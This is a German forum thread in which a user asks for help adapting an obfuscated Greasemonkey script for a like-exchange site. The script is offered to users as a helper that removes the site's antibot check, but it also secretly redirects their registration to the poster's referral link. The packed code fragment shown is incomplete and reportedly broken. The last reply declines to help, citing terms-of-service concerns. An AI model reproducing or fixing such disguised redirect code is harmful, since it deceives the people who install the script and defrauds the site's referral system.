• Das Erstellen neuer Accounts wurde ausgesetzt. Bei berechtigtem Interesse bitte Kontaktaufnahme über die üblichen Wege. Beste Grüße der Admin

Funktion einer Weiterleitung

korines

New member
Hallo Leute,

ich bin wirklich eine totale niete in coden :( bräuchte deswegen eure Hilfe.
Es geht da um eine Greasemonkey Funktion die mir helfen soll ein kleines extra in eine Hilfe zu bauen. Und zwar handelt es dabei um ein Browserspiel ähnlich wie Farmville. Dabei geht es um Sachen die man damit skippen kann bzw. sachen wegmachen kann die für den normalen Gebrauch nicht nötig ist. Genau das wollte ich den Leuten zeigen allerdings wollte ich noch so etwas wie ein kleines extra für mich. Und zwar will ich es so machen das das dieses skippen funktioniert und dabei noch eine funktion hat die Neukömlingen gegebenfalls dazu gebracht werden mit ein refferal zu geben eben in der Url eine art skiplink zu machen die anstatt
.de/reg halt de./ref=(name)
das sollte eben ganz schnell passieren und eigentlich nicht auffallen. Ich habe das schonmal gesehen allerdings finde ich das script nicht mehr, dabei war es notwendig sich selber ganz viele referrals zu machen um möglichst effektiv schnell viele Punkte zu bekommen. Das einzigste was man dabei gemerkt hat ist eben der skiplink der auf den regestrier bottom einfach die seite nochmal neu geladen hat mit dem referral bonus für den der den Code geschrieben hat.
Ich weiß das ihr nicht gerne nichtsahnende versucher an javascript etwas in den A*** zu schieben allerdings wäre ich euch wirklich sehr sehr dankbar dafür wenn ihr mir helfen könntet bei der Sache.

Lg
Korines

Ich habe glücklicherweise die Funktion gefunden die ich brauche. Allerdings war die von jemand anderen und möchte die nun für mich benutzen. das ganze schaut etwas komisch aus.
HTML:
while (c--) if (k[c]) p = p.replace(new RegExp('\b' + e(c) + '\b', 'g'), k[c]);
    return p
}('q h="<f 1c='8' 9='3://8-I.J-5.K' L='O' U='0' V='10:l;1d:l;1i: 1k;z-r: s; t:u; w:x;y:A%;' B='C'></f>";$(".D").E(h);$('a[F$="G();"]').2().2().k();$('e[9$="3://c.b.6/e/M/N-1s-1.P"]').2().2().2().k();Q(R(){$("#8").S()},T);i(j.d=="3://c.b.6/W/X.Y?v=Z"){q 4=$('11[12$="13"]').14();i(4!="15"||4==""){j.d.16("3://c.b.6/?4=17")}}$("#18-19").2().2().2().2().2().1a('<1b><m><n 9="1e://1f.1g.1h/o/1j.o"></n><p 1l="g-1m" 7-1n="1o" 7-1p="1q" 7-1r="H"></p></m>');', 62, 91, '||parent|http|ref||org|data|anis|src||like4like|www|location|img|iframe||code|if|window|remove|none|center|script|js|div|var|index|1000|overflow|hidden||height|50px|width||100|allowTransparency|true|all|prepend|onclick|skiplink|default|boukhris|html|me|scrolling|icon|antibot|no|png|setTimeout|function|slideDown|3000|frameborder|style|user|login|php|register|display|input|name|referral|val|88456|assign|[SIZE=4]anisnio[/SIZE]|earned|credits|append|br|id|border|https|apis|google|com|position|platform|fixed|class|ytsubscribe|channelid|UChwdap1SukHxoCSV39LpAxw|layout|full|count|top'.split('|'), 0, {
}))
:confused::confused::confused::confused:
was diese zahlen und geraden striche zu bedeuten haben weiß ich nicht allerdings. ich weiß nur das das eben der name von dem ref url ist also würde das so ausschauen .com/ref=anisnio .. nun müsste da mein name rein und dieses extra fenster weggemacht werden. wenn ich dort aber nur mein name reinschreibe so das die referrals zu mir gehen sollten, startet dieses script immer wieder neu so das ich garnichts in die regestrierung eingeben kann. bei ihm ist das allerdings ganz einfach obwohl es sich ja eigentlich nur um einen namen handelt oder lieg ich da falsch? außerdem kommt immer eine meldung die mir sagt das was in der meta fehlen sollte nur weil ich den namen geändert habe? wie kann ich das besser machen?

Zuletzt bearbeitet von einem Moderator:
Schick den Code doch erstmal durch den jsbeautifier damit er ordentlich lesbar ist. Und wenn du hier Code postest schließe ihn bitte in HTML oder Code Tags ein.

HTML:
while (c--)
    if (k[c]) p = p.replace(new RegExp('\b' + e(c) + '\b', 'g'), k[c]);
return p
}('q h="<f 1c='
    8 ' 9='
    3: //8-I.J-5.K' L='O' U='0' V='10:l;1d:l;1i: 1k;z-r: s; t:u; w:x;y:A%;' B='C'></f>";$(".D").E(h);$('a[F$="G();"]').2().2().k();$('e[9$="3://c.b.6/e/M/N-1s-1.P"]').2().2().2().k()
  	;Q(R(){$("#8").S()},T);i(j.d=="3://c.b.6/W/X.Y?v=Z"){q 4=$('11[12$="13"]').14();i(4!="15"||4==""){j.d.16("3://c.b.6/?4=17")}}$("#18-19").2().2().2().2().2().1a('<1b><m><n 9="1e:
  	//1f.1g.1h/o/1j.o"></n><p 1l="g-1m" 7-1n="1o" 7-1p="1q" 7-1r="H"></p></m>');', 62, 91, '
  	||parent|http|ref||org|data|anis|src||like4like|www|location|img|iframe||code|if|window|remove|none|center|script|js|div|var|index|1000|overflow|hidden||height|50px|width||100|allowTransparency
   	|true|all|prepend|onclick|skiplink|default|boukhris|html|me|scrolling|icon|antibot|no|png|setTimeout|function|slideDown|3000|frameborder|style|user|login|php|register|display|input|name|referral|val|88456|assign|[SIZE=4]anisnio[/SIZE]|earned|credits|append|br|id|border|https|apis|google|com|position|platform|fixed|class|ytsubscribe|channelid|UChwdap1SukHxoCSV39LpAxw|layout|full|count|top'.split('|'), 0, {
}))
hoffe das es so nun besser aussieht :S
meine frage ist nun - ich denke das es von hier anfängt
|user|login|php|register|display|input|name|referral|val|88456|assign|anisnio|earned|credits|append|br|id|border|https|apis|google|com|position|platform|fixed|class|ytsubscribe|channelid|UChwdap1SukHxoCSV39LpAxw|layout|full|count|top'.split('|'), 0, {
}))
dieses anisnio ist der nickname den ich ändern möchte. problem ist jedes mal wenn ich das mache bzw mein namen reinschreibe startet das script immer wieder neu - heißt ich klicke auf registrieren -> weiterleitung -> startseite mit meinem referral link. so denke ich es mir. wenn ich nun wieder auf registrieren klicke sollte es eigentlich funktionieren da ja mein referral link drin ist. nun das problem: das script startet nochmal und sobald ich auf auf registrieren klicke komm ich immer wieder auf die startseite. fazit: kreislauf? was mich aber noch wundert ist. was macht das val - 88456? ich verzweifel langsam.. probier das nun stunden und komm immer wieder auf das gleiche problem hinaus :S

lg
korines

Zuletzt bearbeitet:
Ich glaube, damit ist sogar der Beautifier überfordert :)
Ist auch kein Wunder, da fehlen Klammern. Korines, das ist nicht vollständig. Oberhalb fehlt noch etwas, was die geschweifte schließende Klammer hinter return p auch öffnet. Und dein Problem habe ich auch noch nicht verstanden. Kann man sich da irgendwo etwas im Netz ansehen? Ist die Seite mit der Problemstellung online?

ja die seite ist online, das script soll den nutzern der seite ja helfen, habe ihnen/dir eine nachricht geschrieben.

Wie gesagt. Ich bitte um Verständnis, dass ich keinen Individualsupport leisten kann. Bitte ein, zwei Screenshots und ein paar Stichworte hier posten. Ist nicht böse gemeint, ich mach das bei keinem, hat nichts mit dir zu tun.

Copy-Paste der Nachricht:

Wie gesagt, ich kann es leider nicht genauer Beschreiben.
Es ist eigentlich eine Seite um sein Social Media zu verbessern. Man Liked, Followed, Subscribed sachen um eben selber etwas besser dazustehen.
Das ganze läuft über Credits, ich Like etwas bekomme 9 Credits.
Nun kann ich diese 9 Credits benutzen um selber Likes zu bekommen.
Nun die Hilfe in dem Script, es handelt sich um ein Antibot deleter. Dieser Antibot ist eine speere sobald man drauf drückt und für jeden Boter oder Scriptuser ein muss.
Aber auch so relativ gut da man nach 3 mal draufklicken geblockt ist für ein paar Tage.
Diese Hilfe will ich online stellen, sie funktioniert hervorragend allerdings wollte ich mir ein kleinen Bonus geben indem ich eben Referrals bekomme. 10% von ihren einnahmen kriege ich. Bei 100 Referrals ist das schon ausreichend, hab aber schon User gesehen mit 1300 Referrals da die eben eine Greasemonkey funktion von ihm genutzt haben. Ist halt das, sobald jemand ein neuen Account macht (was effektiver ist als ein Account zu pushen da die Referral Punkte wirklich in die Höhe steigen) bekommt er wegen einer Weiterleitung sein Nickname als Referral link, das bemerkt man kaum und ist für nichtswissende nicht zu merken. Dieses Script ist es eben, also dieses Anisnio ist sein Nickname.
Nun dachte ich mir einfach stell ich mein Script online mit der gleichen Hilfe für User um genau so viele Referrals zu bekommen, sobald ich dort aber mein Name reinschreibe funktioniert es komischerweise nicht mehr. Sobald ich auf Registrieren klicke um diese Weiterleitung zu aktivieren, komm ich auf die Startseite, ob ich nun mit meinem Referral drin bin oder nicht weiß ich nicht genau. Auf jeden Fall sollte es beim zweiten mal klappen da mein Referral link drin ist. Leider Fehlanzeige, das script startet von neu so das ich immer wieder auf die Startseite komme, nun kam ein Licht bei mir auf. Ich weiß nicht ob es ein denkfehler ist, aber kann es sein das das Script immer wieder von vorne startet weil mein Referral link nicht drin ist? sobald er drin ist, ist die funktion ausgeschalten deswegen klappt es bei ihm beim zweiten mal. aber wieso sollte es bei mir nicht funktinieren? ob ich nun sein nickname drin habe oder meinen kommt doch auf das gleiche raus? ich bin so verwirrt. aber hast du verstanden wozu ich das nun brauche und wo ungefähr der fehler liegt?Bildschirmfoto 2014-05-18 um 22.39.29.png nun ja ein screenshot ist schwer zu machen bei dem thema.. aber so schaut die registrier seite aus. sobald ich im script meinen namen reingeschrieben habe komm ich immer wieder auf mein referral link der mich immer wieder automatisch auf die startseite schickt :S Bildschirmfoto 2014-05-18 um 22.42.17.png

Da dieses Antibot Zeugs ziemlich sicher gegen die Benutzungsbediungungen der Seite verstoßen, rate ich allen, hier keine Hilfeleistung zu geben.

Auch kann der Skriptfetzen oben nicht funktionieren, da er Syntaxfehler enthält.

Zurück
Oben